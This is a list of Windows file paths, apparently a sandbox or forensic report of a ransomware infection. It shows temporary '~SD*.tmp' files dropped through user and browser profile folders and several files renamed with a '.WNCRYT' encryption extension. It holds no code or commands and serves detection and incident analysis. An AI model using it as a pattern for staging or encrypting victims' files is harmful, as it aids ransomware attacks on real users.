file: C:\Users\Default\Favorites\~SDBC57.tmp
file: C:\Users\Default\Links\~SDBC58.tmp
file: C:\Users\Default\Music\~SDBC59.tmp
file: C:\Users\Default\Pictures\~SDBC5A.tmp
file: C:\Users\Default\Saved Games\~SDBC6A.tmp
file: C:\Users\Default\Videos\~SDBC6B.tmp
file: C:\Users\Public\~SDBC6C.tmp
file: C:\Users\Public\Desktop\~SDBC6D.tmp
file: C:\Users\Public\Documents\~SDBC6E.tmp
file: C:\Users\Public\Downloads\~SDBCCD.tmp
file: C:\Users\Public\Favorites\~SDBCFD.tmp
file: C:\Users\Public\Libraries\~SDBD1D.tmp
file: C:\Users\Public\Music\~SDBD5D.tmp
file: C:\Users\Public\Music\Sample Music\~SDBDBC.tmp
file: C:\Users\Public\Pictures\~SDBE1A.tmp
file: C:\Users\Public\Pictures\Sample Pictures\~SDBE89.tmp
file: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRYT
file: C:\Users\Public\Recorded TV\~SDC05E.tmp
file: C:\Users\Public\Recorded TV\Sample Media\~SDC0AE.tmp
file: C:\Users\Public\Videos\~SDC0DD.tmp
file: C:\Users\Public\Videos\Sample Videos\~SDC0EE.tmp
file: C:\Users\user\~SDC0EF.tmp
file: C:\Users\user\.ms-ad\~SDC0F0.tmp
file: C:\Users\user\AppData\~SDC0F1.tmp
file: C:\Users\user\AppData\Local\~SDC0F2.tmp
file: C:\Users\user\AppData\Local\Adobe\~SDC103.tmp
file: C:\Users\user\AppData\Local\Adobe\Acrobat\~SDC104.tmp
file: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\~SDC105.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\~SDC106.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\~SDC116.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\~SDC117.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\~SDC176.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\~SDC1B6.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\fb9136c9-56b8-4a66-aca4-73cc2fd2f175\~SDC214.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\~SDC263.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\~SDC293.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\~SDC2D3.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\~SDC312.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\~SDC342.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\~SDC391.tmp
file: C:\Users\user\AppData\Local\Adobe\ARM\~SDC3D1.tmp
file: C:\Users\user\AppData\Local\Adobe\ARM\S\~SDC3F1.tmp
file: C:\Users\user\AppData\Local\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\~SDC450.tmp
file: C:\Users\user\AppData\Local\Adobe\Color\~SDC49F.tmp
file: C:\Users\user\AppData\Local\Apps\~SDC51D.tmp
file: C:\Users\user\AppData\Local\Apps\2.0\~SDC54D.tmp
file: C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\~SDC56D.tmp
file: C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V\~SDC5BC.tmp
file: C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V\manifests\~SDC5EC.tmp
file: C:\Users\user\AppData\Local\Apps\2.0\Data\~SDC60C.tmp
file: C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO\~SDC66B.tmp
file: C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO\M3VCAP6Z.25X\~SDC6AB.tmp
file: C:\Users\user\AppData\Local\Boxstarter\~SDC6DA.tmp
file: C:\Users\user\AppData\Local\CEF\~SDC72A.tmp
file: C:\Users\user\AppData\Local\CEF\User Data\~SDC769.tmp
file: C:\Users\user\AppData\Local\CEF\User Data\Dictionaries\~SDC799.tmp
file: C:\Users\user\AppData\Local\Deployment\~SDC7D8.tmp
file: C:\Users\user\AppData\Local\Google\~SDC828.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\~SDC867.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\~SDC8C6.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates\~SDC8D6.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\~SDC8D7.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\~SDC8D8.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing\~SDC8D9.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\~SDC8DA.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\~SDC8DB.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports\~SDC8EC.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny\~SDC95A.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\~SDC9AA.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\~SDCA08.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\~SDCA57.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\44191681-e6d2-41ed-948c-a2cdae484e83\~SDCAC6.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\~SDCB34.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\~SDCBA3.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\~SDCBE2.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\~SDCC22.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\~SDCC32.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\~SDCC33.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\~SDCC34.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\~SDCC35.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\~SDCC36.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\~SDCC66.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\~SDCC96.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\~SDCCD5.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\~SDCD34.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\~SDCD74.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\~SDCDB3.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\~SDCE02.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\~SDCE51.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\~SDCE91.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\~SDCEB1.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\~SDCEE1.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\~SDCF01.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\~SDCF22.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\~SDCF71.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\~SDCF91.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\~SDCFB1.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\~SDCFE1.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\~SDD04F.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\~SDD09F.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\~SDD0DE.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\~SDD10E.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\~SDD14D.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\~SDD16E.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\~SDD1AD.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\~SDD1ED.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\~SDD23C.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\~SDD25C.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\~SDD29C.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\~SDD2CB.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\~SDD2EC.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\~SDD32B.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies\~SDD37A.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded\~SDD3AA.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\~SDD3EA.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\~SDD41A.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data\~SDD459.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload\~SDD489.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\~SDD4C8.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationHints\~SDD4F8.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials\~SDD4F9.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata\~SDD4FA.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl\~SDD4FB.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved\~SDD4FC.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\~SDD50D.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips\~SDD50E.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\~SDD54D.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\~SDD55E.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\~SDD57E.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\~SDD59F.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\SwReporter\~SDD5BF.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\~SDD5EF.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\UrlParamClassifications\~SDD61F.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\WidevineCdm\~SDD65E.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\~SDD69E.tmp
file: C:\Users\user\AppData\Local\Microsoft\~SDD6DD.tmp
file: C:\Users\user\AppData\Local\Microsoft\Credentials\~SDD70D.tmp
file: C:\Users\user\AppData\Local\Microsoft\Device Metadata\~SDD73D.tmp
file: C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache\~SDD77C.tmp
file: C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache\downloads\~SDD78D.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\~SDD7AD.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\~SDD7CD.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\~SDD7EE.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\~SDD81E.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\~SDD87C.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\~SDD8BC.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\~SDD90B.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase\~SDD979.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\~SDD9D8.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\6af35b70-7d44-4f46-9acd-3b4fa9cd6081\~SDDA27.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase\~SDDA67.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\~SDDAA6.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\~SDDAA7.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\~SDDAC7.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\~SDDAD8.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\~SDDAE9.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\~SDDAF9.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\~SDDB1A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens\~SDDB2A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\~SDDB2B.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\~SDDB3C.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB\~SDDB8B.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB\~SDDBDA.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\~SDDC29.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\JumpListIconsRecentClosed\~SDDC49.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\~SDDC5A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\~SDDC9A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\~SDDCD9.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\~SDDCF9.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Platform Notifications\~SDDD39.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\~SDDD59.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\~SDDDB8.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\~SDDE07.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\~SDDE56.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\~SDDE76.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\~SDDEA6.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\~SDDEE6.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\~SDDF35.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\~SDDF84.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\~SDDFD3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\~SDE022.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\~SDE081.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\~SDE0A1.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\~SDE0E1.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\~SDE101.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\~SDE150.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Platform Notifications\~SDE1CE.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\~SDE21D.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\~SDE24D.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\~SDE26D.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FontLookupTableCache\~SDE2BC.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PepperFlash\~SDE2FC.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\~SDE36A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\~SDE39A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\~SDE3DA.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\~SDE3EA.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\~SDE40B.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\~SDE42B.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\~SDE46A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\~SDE4AA.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm\~SDE4DA.tmp
file: C:\Users\user\AppData\Local\Microsoft\Event Viewer\~SDE529.tmp
file: C:\Users\user\AppData\Local\Microsoft\Feeds\~SDE578.tmp
file: C:\Users\user\AppData\Local\Microsoft\Feeds\Feeds for United States~\~SDE5D7.tmp
file: C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\~SDE626.tmp
file: C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\~SDE646.tmp
file: C:\Users\user\AppData\Local\Microsoft\Feeds Cache\~SDE6B4.tmp
file: C:\Users\user\AppData\Local\Microsoft\Feeds Cache\BD5QM5PR\~SDE6F4.tmp
file: C:\Users\user\AppData\Local\Microsoft\Feeds Cache\S0OSSLWD\~SDE733.tmp
file: C:\Users\user\AppData\Local\Microsoft\Feeds Cache\SQ4TDUZM\~SDE773.tmp
file: C:\Users\user\AppData\Local\Microsoft\Feeds Cache\ZLFI91IZ\~SDE7A3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\~SDE7D3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\~SDE822.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\~SDE871.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\3HLJ65W4\~SDE8B0.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\D3CVYKUR\~SDE8D1.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DGF898HW\~SDE8F1.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DRJ7CCJA\~SDE8F2.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\~SDE8F3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieUserList\~SDE932.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EUPP\~SDE982.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\~SDE9E0.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\~SDEA2F.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\l51tpzc\~SDEA40.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\rs8lb9c\~SDEA60.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\~SDEABF.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\~SDEAFF.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\~SDEB2E.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\~SDEB4F.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\TabRoaming\~SDEB5F.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\~SDEB60.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440\~SDEB71.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\~SDEB72.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tracking Protection\~SDEB73.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlockManager\~SDEB74.tmp
file: C:\Users\user\AppData\Local\Microsoft\Media Player\~SDEBB3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\~SDEBE3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\~SDEBF4.tmp
file: C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000C0CE\~SDEC24.tmp
file: C:\Users\user\AppData\Local\Microsoft\Media Player\Transcoded Files Cache\~SDEC44.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\~SDEC74.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\15.0\~SDECB3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\~SDED03.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\~SDED32.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\binaries.templates.cdn.office.net\~SDED62.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\cdn.odc.officeapps.live.com\~SDEDD1.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\office15client.microsoft.com\~SDEDD2.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\16.0\~SDEDD3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate\~SDEDD4.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\~SDEDD5.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\AppCommands\~SDEDE5.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\~SDEDE6.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\~SDEDE7.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ThirdPartyNotices.txt.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\af\~SDEDF8.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\am-et\~SDEDF9.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\amd64\~SDEDFA.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ar\~SDEDFB.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\as-in\~SDEDFC.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\az-latn-az\~SDEDFD.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\be\~SDEDFE.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bg\~SDEE1E.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-bd\~SDEE4E.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-in\~SDEE7E.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bs-latn-ba\~SDEECD.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca\~SDEF3B.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca-es-valencia\~SDEF6B.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cs\~SDEFCA.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cy-gb\~SDEFFA.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\da\~SDF0A7.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\de\~SDF0E6.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\el\~SDF126.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\en\~SDF156.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\en-gb\~SDF1A5.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\es\~SDF1E4.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\et\~SDF214.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\eu\~SDF273.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fa\~SDF2E1.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fi\~SDF311.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fil-ph\~SDF341.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fr\~SDF361.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ga-ie\~SDF362.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gd\~SDF363.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gd-latn\~SDF364.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gl\~SDF365.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gu\~SDF366.tmp
